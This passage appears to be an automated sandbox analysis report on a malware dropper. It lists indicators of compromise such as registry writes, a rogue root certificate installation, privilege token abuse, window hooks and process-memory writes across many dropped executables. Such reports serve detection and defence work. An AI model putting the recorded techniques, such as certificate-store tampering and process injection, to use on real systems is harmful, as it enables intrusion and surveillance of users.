Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	Graphics.exe

Modifies registry class 4 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

File.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	File.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	File.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

6444 PING.EXE

pid	process
6444	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exeWerFault.exejfiag3g_gg.exemsedge.exe

pid	process
2912	pub2.exe
2912	pub2.exe
1536	WerFault.exe
1536	WerFault.exe
640	jfiag3g_gg.exe
640	jfiag3g_gg.exe
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2392	msedge.exe
2392	msedge.exe
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920
2920

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

pub2.exeJL_70clypUUuVLNEieSPeTOV.exe

pid process

2912 pub2.exe
396 JL_70clypUUuVLNEieSPeTOV.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

3888 msedge.exe
3888 msedge.exe
3888 msedge.exe
3888 msedge.exe

pid	process
3888	msedge.exe
3888	msedge.exe
3888	msedge.exe
3888	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exeWerFault.exemd9_1sjm.exe

description	pid	process
Token: SeDebugPrivilege	1584	SoCleanInst.exe
Token: SeCreateTokenPrivilege	2132	Install.exe
Token: SeAssignPrimaryTokenPrivilege	2132	Install.exe
Token: SeLockMemoryPrivilege	2132	Install.exe
Token: SeIncreaseQuotaPrivilege	2132	Install.exe
Token: SeMachineAccountPrivilege	2132	Install.exe
Token: SeTcbPrivilege	2132	Install.exe
Token: SeSecurityPrivilege	2132	Install.exe
Token: SeTakeOwnershipPrivilege	2132	Install.exe
Token: SeLoadDriverPrivilege	2132	Install.exe
Token: SeSystemProfilePrivilege	2132	Install.exe
Token: SeSystemtimePrivilege	2132	Install.exe
Token: SeProfSingleProcessPrivilege	2132	Install.exe
Token: SeIncBasePriorityPrivilege	2132	Install.exe
Token: SeCreatePagefilePrivilege	2132	Install.exe
Token: SeCreatePermanentPrivilege	2132	Install.exe
Token: SeBackupPrivilege	2132	Install.exe
Token: SeRestorePrivilege	2132	Install.exe
Token: SeShutdownPrivilege	2132	Install.exe
Token: SeDebugPrivilege	2132	Install.exe
Token: SeAuditPrivilege	2132	Install.exe
Token: SeSystemEnvironmentPrivilege	2132	Install.exe
Token: SeChangeNotifyPrivilege	2132	Install.exe
Token: SeRemoteShutdownPrivilege	2132	Install.exe
Token: SeUndockPrivilege	2132	Install.exe
Token: SeSyncAgentPrivilege	2132	Install.exe
Token: SeEnableDelegationPrivilege	2132	Install.exe
Token: SeManageVolumePrivilege	2132	Install.exe
Token: SeImpersonatePrivilege	2132	Install.exe
Token: SeCreateGlobalPrivilege	2132	Install.exe
Token: 31	2132	Install.exe
Token: 32	2132	Install.exe
Token: 33	2132	Install.exe
Token: 34	2132	Install.exe
Token: 35	2132	Install.exe
Token: SeDebugPrivilege	3896	taskkill.exe
Token: SeRestorePrivilege	1536	WerFault.exe
Token: SeBackupPrivilege	1536	WerFault.exe
Token: SeBackupPrivilege	1536	WerFault.exe
Token: SeManageVolumePrivilege	1036	md9_1sjm.exe
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeManageVolumePrivilege	1036	md9_1sjm.exe
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920
Token: SeCreatePagefilePrivilege	2920
Token: SeShutdownPrivilege	2920

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

msedge.exe

pid process

3888 msedge.exe
2920
2920
3888 msedge.exe
2920
3888 msedge.exe
2920
2920

pid	process
3888	msedge.exe
2920
2920
3888	msedge.exe
2920
3888	msedge.exe
2920
2920

Suspicious use of SetWindowsHookEx 33 IoCs

Processes:

Yrl6mQelU772YDzLxKLlvTON.exey26j85o5orQWhRjG019OdhO1.exexT8oVG7Ymi6m1fV0UMC5DZ8z.exeHJ82Zji5EzXgVJjXxqQFo7SK.exeJL_70clypUUuVLNEieSPeTOV.exeLPg3_wwTiU2yDi5RWc41_sb2.exebPSpWAxIew9oHILHf3g1OKqd.exe8nN53RgEjLsU7HMfJixhS7il.exefZUCD3AXYtPe3U3cgu57MhaF.exeyylv0bFITZ3B6YKSlojcSQEb.exe0xcuKppcvRYJEXv5vQV5b3EE.exej9czdh4qGe3Kc5uEhqFDTMCo.exevJTNSHqpM_uXMxqzh7RXQZMP.exeh2p_WwwxN2hmoFLDtYdDzrSQ.exeldf3XO4wpF2KeP1jUswCvirT.exemZkbGUdQk2vacg7qyKpG0jlH.exebPSpWAxIew9oHILHf3g1OKqd.tmpvZRazqC1JjHdbGBRX5CY5qkl.exeZkQF5B0SU36FG_P5aqhYpUY5.exeki39HJ6ZwIVHm_gigZgUPZS4.exeMWtIGmpeRx1i_JRQoRfayaTT.exeF2iBcq7qlXlEsigDUaVqAEtQ.exeVMK9oluwXQ9gKJjFgBGKpcLY.exee7b5z0g1Rdi0ulaDZW_bVmBa.exee7b5z0g1Rdi0ulaDZW_bVmBa.tmpldf3XO4wpF2KeP1jUswCvirT.exeFI1LI.exekbhDLwsahLlhjOM1qB7TizoL.exejg1_1faf.exeFGG59.exe858E3.exe7IG03.exeInstall.exe

pid	process
5212	Yrl6mQelU772YDzLxKLlvTON.exe
4788	y26j85o5orQWhRjG019OdhO1.exe
3148	xT8oVG7Ymi6m1fV0UMC5DZ8z.exe
4984	HJ82Zji5EzXgVJjXxqQFo7SK.exe
4180	JL_70clypUUuVLNEieSPeTOV.exe
5384	LPg3_wwTiU2yDi5RWc41_sb2.exe
5372	bPSpWAxIew9oHILHf3g1OKqd.exe
1840	8nN53RgEjLsU7HMfJixhS7il.exe
2364	fZUCD3AXYtPe3U3cgu57MhaF.exe
3268	yylv0bFITZ3B6YKSlojcSQEb.exe
5360	0xcuKppcvRYJEXv5vQV5b3EE.exe
5556	j9czdh4qGe3Kc5uEhqFDTMCo.exe
1284	vJTNSHqpM_uXMxqzh7RXQZMP.exe
5568	h2p_WwwxN2hmoFLDtYdDzrSQ.exe
5828	ldf3XO4wpF2KeP1jUswCvirT.exe
5572	mZkbGUdQk2vacg7qyKpG0jlH.exe
5136	bPSpWAxIew9oHILHf3g1OKqd.tmp
4156	vZRazqC1JjHdbGBRX5CY5qkl.exe
5148	ZkQF5B0SU36FG_P5aqhYpUY5.exe
5304	ki39HJ6ZwIVHm_gigZgUPZS4.exe
5380	MWtIGmpeRx1i_JRQoRfayaTT.exe
5292	F2iBcq7qlXlEsigDUaVqAEtQ.exe
4280	VMK9oluwXQ9gKJjFgBGKpcLY.exe
6508	e7b5z0g1Rdi0ulaDZW_bVmBa.exe
6836	e7b5z0g1Rdi0ulaDZW_bVmBa.tmp
6864	ldf3XO4wpF2KeP1jUswCvirT.exe
6908	FI1LI.exe
6980	kbhDLwsahLlhjOM1qB7TizoL.exe
6928	jg1_1faf.exe
4368	FGG59.exe
5684	858E3.exe
6720	7IG03.exe
5792	Install.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exeFolder.exeFiles.exemsedge.exeInstall.execmd.exerUNdlL32.eXeWerFault.exe

description	pid	process	target process
PID 1952 wrote to memory of 1584	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	SoCleanInst.exe
PID 1952 wrote to memory of 1584	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	SoCleanInst.exe
PID 1952 wrote to memory of 1036	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	md9_1sjm.exe
PID 1952 wrote to memory of 1036	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	md9_1sjm.exe
PID 1952 wrote to memory of 1036	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	md9_1sjm.exe
PID 1952 wrote to memory of 860	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Folder.exe
PID 1952 wrote to memory of 860	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Folder.exe
PID 1952 wrote to memory of 860	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Folder.exe
PID 1952 wrote to memory of 4556	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Graphics.exe
PID 1952 wrote to memory of 4556	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Graphics.exe
PID 1952 wrote to memory of 4556	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Graphics.exe
PID 1952 wrote to memory of 1708	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Updbdate.exe
PID 1952 wrote to memory of 1708	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Updbdate.exe
PID 1952 wrote to memory of 1708	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Updbdate.exe
PID 1952 wrote to memory of 2132	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Install.exe
PID 1952 wrote to memory of 2132	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Install.exe
PID 1952 wrote to memory of 2132	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Install.exe
PID 1952 wrote to memory of 4936	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Files.exe
PID 1952 wrote to memory of 4936	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Files.exe
PID 1952 wrote to memory of 4936	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	Files.exe
PID 1952 wrote to memory of 2912	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	pub2.exe
PID 1952 wrote to memory of 2912	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	pub2.exe
PID 1952 wrote to memory of 2912	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	pub2.exe
PID 860 wrote to memory of 4864	860	Folder.exe	Folder.exe
PID 860 wrote to memory of 4864	860	Folder.exe	Folder.exe
PID 860 wrote to memory of 4864	860	Folder.exe	Folder.exe
PID 1952 wrote to memory of 3308	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	File.exe
PID 1952 wrote to memory of 3308	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	File.exe
PID 1952 wrote to memory of 3308	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	File.exe
PID 4936 wrote to memory of 4296	4936	Files.exe	jfiag3g_gg.exe
PID 4936 wrote to memory of 4296	4936	Files.exe	jfiag3g_gg.exe
PID 4936 wrote to memory of 4296	4936	Files.exe	jfiag3g_gg.exe
PID 1952 wrote to memory of 3888	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	msedge.exe
PID 1952 wrote to memory of 3888	1952	036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe	msedge.exe
PID 3888 wrote to memory of 4288	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 4288	3888	msedge.exe	msedge.exe
PID 2132 wrote to memory of 2252	2132	Install.exe	cmd.exe
PID 2132 wrote to memory of 2252	2132	Install.exe	cmd.exe
PID 2132 wrote to memory of 2252	2132	Install.exe	cmd.exe
PID 2252 wrote to memory of 3896	2252	cmd.exe	taskkill.exe
PID 2252 wrote to memory of 3896	2252	cmd.exe	taskkill.exe
PID 2252 wrote to memory of 3896	2252	cmd.exe	taskkill.exe
PID 960 wrote to memory of 3332	960	rUNdlL32.eXe	rundll32.exe
PID 960 wrote to memory of 3332	960	rUNdlL32.eXe	rundll32.exe
PID 960 wrote to memory of 3332	960	rUNdlL32.eXe	rundll32.exe
PID 2864 wrote to memory of 3332	2864	WerFault.exe	rundll32.exe
PID 2864 wrote to memory of 3332	2864	WerFault.exe	rundll32.exe
PID 4936 wrote to memory of 640	4936	Files.exe	jfiag3g_gg.exe
PID 4936 wrote to memory of 640	4936	Files.exe	jfiag3g_gg.exe
